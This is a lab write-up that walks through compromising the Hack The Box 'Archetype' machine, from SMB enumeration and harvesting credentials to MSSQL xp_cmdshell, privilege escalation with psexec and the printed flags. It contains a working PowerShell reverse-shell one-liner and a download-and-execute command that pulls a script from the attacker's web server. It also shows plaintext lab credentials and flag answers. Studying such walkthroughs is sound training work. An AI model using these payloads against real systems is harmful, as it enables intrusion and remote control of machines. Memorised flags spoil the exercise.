Archetype

Enumeration

As always, let's start with nmap:

nmap -sV -sC IP

Replace IP by the IP of your target machine (Archetype)

The IP of the target machines are always changing so make sure you type the correct one. You can find it on your Hack The Box account.

We can see that port 445 is open which is usually associated with file sharing (SMB). So let's find out if we can list the shares available using:

smbclient -L IP

SMB authentication always require a username. If you don't specify one, it will use your VM username as default.

When prompted for the password just press enter

We can see there are 4 shares available. Let's check the first share called ADMIN$

smbclient \\\\IP\\ADMIN$

When prompted for the password, just press enter.

Access is denied.

Let's check the second share called backups:

smbclient \\\\IP\\backups

When prompted for the password, just press enter.

We got access to that share!

ls

Let's download the file prod.dtsConfig to our VM

get prod.dtsConfig

The get command will download the file to your current directory/home directory. Open your home directory and check the content of that file

Looks like we found some credentials:

User ID=ARCHETYPE\sql_svc

Password=M3g4c0rp123

To exit the share, just type:

exit

Let's move on. The nmap we used at the beginning also showed that port 1433 is open, which is usually associated with SQL server. Now that we have some credentials, we just need to find a way to connect and authenticate to the MSSQL server. Let's use Impacket's tool mssqlclient.py to do that.

locate mssqlclient

Let's change directory:

cd /usr/share/doc/python3-impacket/examples

python3 mssqlclient.py

This tells us that we need to type: username@targetIP

This also tells us that we need to add -windows-auth

python3 mssqlclient.py sql_svc@IP -windows-auth

Type the password we found earlier:

Password=M3g4c0rp123

We successfully authenticated to the Microsoft SQL server!

help

Looks like we can use xp_cmdshell followed by the command we want to execute, using xp_cmdshell {cmd}

First, we need to enable it by typing enable_xp_cmdshell

enable_xp_cmdshell

We are told to run the RECONFIGURE statement to install

RECONFIGURE

Now we can use xp_cmshell followed by a command we want to execute:

xp_cmdshell whoami

Now let's try to find out if we have sysadmin right by typing:

SELECT IS_SRVROLEMEMBER ('sysadmin')

The output is 1 so it means we are part of the sysadmin group!

Now, let's try to get a stable reverse shell. Let's use this reverse shell found at: https://gist.githubusercontent.com/egre55/c058744a4240af6515eb32b2d33fbed3/raw/2c6e4a2d6fd72ba0f103cce2afa3b492e347edc2/powershell_reverse_shell.ps1

We just need to change 2 things from the script:

- The IP ---> this is the IP of your VM (the attackers' machine)

If you don't know your IP, open a new command prompt window and type ifconfig

- The port number ---> this is the port on which you will listen using netcat. We will start our netcat listener on port 4444

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.11",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Go to your Downloads folder and create a new file called shell.ps1

Open it and copy paste the script above, then save your file.

Now we need to get the target machine to go and download our PowerShell script shell.ps1

To do that, we will create a simple web server on our attacker's machine (our VM):

From your VM, open a new command prompt window and go to the Downloads directory:

cd Downloads

sudo python3 -m http.server 8080

This command will start a web server in our current directory (as in in the Downloads directory)

Do not close this window! Otherwise it will stop your web server.

Open your browser and check that the website has been created

http://10.10.14.11:8080/

10.10.14.11 is the IP of my VM - it will be different for you. Make sure you type your VM's IP. If you don't know the IP of your VM, open a new command prompt window and type ifconfig

Now we need to install ufw (uncomplicated firewall) on our VM.

Open a new command prompt window and type

sudo apt install ufw

sudo ufw enable

We now need to add a rule so that the target machine can connect back to our attacker machine (our VM)

sudo ufw allow from 10.129.243.63 proto tcp to any port 8080,4444

10.129.243.63 is the target machine

port 8080 because our webserver is on port 8080

port 4444 because we will start our netcat listener on port 4444

Now, still from your VM, open a new command prompt window and set up your netcat listener

nc -lnvp 4444

Only after you set up your netcat, go back to the target machine and type:

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.11:8080/shell.ps1\");"

10.10.14.11 is the IP of my VM (attacker's machine) - The IP of your VM will be different. If you don't know the IP of your VP, open a new command prompt window and type ifconfig

Go back to your netcat and you should have a connection:

Type

whoami

cd C:\Users

dir

cd sql_svc

dir

cd Desktop

dir

type user.txt

3e7b102e78218e935bf3f4951fec21a3

You got the user flag! Congratulations!

It's always good to check the console history file where we can see the frequently accessed files and/or any executed commands. The history file is called ConsoleHost_history.txt and can be found in this directory: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine

cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine

cat ConsoleHost_history.txt

net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!

We just found more credentials!

The net use or net.exe use command is used to show detailed information about currently mapped drives and devices. It is used this way:

net use           [{devicename | *}]      \\computername\sharename /user:username

devicename ---> Use this option to specify the Drive letter (here Drive letter T)

\\computername\sharename ---> specifies the name of the computer, computername, and the shared resource, sharename

More info on net use can be found at https://www.lifewire.com/net-use-command-2618096

Privilege Escalation

Impacket also has a tool called psexec.py and we can use this tool to connect to the server using the credentials we just found.

From your VM, open a new prompt window

locate psexec.py

cd /usr/share/doc/python3-impacket/examples

python3 psexec.py

python3 psexec.py administrator@10.129.243.63

10.129.243.63 is the IP of the target machine

Type the password we just found and press enter

MEGACORP_4dm1n!!

whoami

We just escalated our privileges and we are now the nt authority\system

You can usually find the root flag at C:\Users\Administrator\Desktop

cd C:\Users\Administrator\Desktop

dir

type root.txt

b91ccec3305e98240082d4474b848528

Congratulations! you got the root flag!

Archetype

Enumeration

Privilege Escalation

Recent Posts